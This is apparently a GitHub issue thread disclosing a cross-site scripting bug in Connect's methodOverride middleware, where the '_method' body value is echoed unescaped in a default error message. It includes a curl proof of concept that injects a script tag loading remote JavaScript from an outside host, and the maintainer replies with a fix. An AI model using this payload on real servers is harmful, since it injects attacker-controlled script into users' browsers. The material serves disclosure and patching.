Security Issue - Cross-Site Scripting with connect.methodOverride()

[m13]

This middleware overwrite req.method with the req.body['_method'] value. When you don't catch the error it responds with a default error msg: "Cannot [METHOD] [URL]" (

connect/lib/proto.js

Line 155 in 6db901f

res.end('Cannot ' + req.method + ' ' + utils.escape(req.originalUrl));

). Because this is not enough sanitized, you can force a Cross-Site Scripting in the response:

~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /

This is very dangerous because in a server like ExpressJS it won't be handled with a app.all('/*', ...), so all servers using this middleware are vulnerable.

To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.

[tj]

I patched with an escape for now but I'll whitelist the methods as well, it's not a huge vulnerability since you can't easily pass around a POST but doesn't hurt to escape, thanks for the report